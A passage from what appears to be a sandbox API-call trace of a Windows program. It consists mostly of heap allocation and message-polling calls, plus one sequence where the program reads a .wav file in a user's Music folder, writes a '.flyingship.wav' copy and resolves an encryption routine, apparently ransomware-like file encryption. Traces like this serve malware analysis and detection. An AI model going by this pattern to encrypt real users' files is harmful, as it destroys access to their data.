lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0186.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0186.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0186.290] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0186.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0186.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\wwubmhmkz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.292] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.292] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0186.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0186.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.293] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0186.293] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0186.293] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0186.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0186.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0186.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\wwubmhmkz.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0186.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.301] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0186.301] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8f92, lpOverlapped=0x0) returned 1 [0186.383] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0186.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8f92) returned 0xbea018 [0186.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.384] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.385] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0186.385] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.385] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.386] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.386] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, 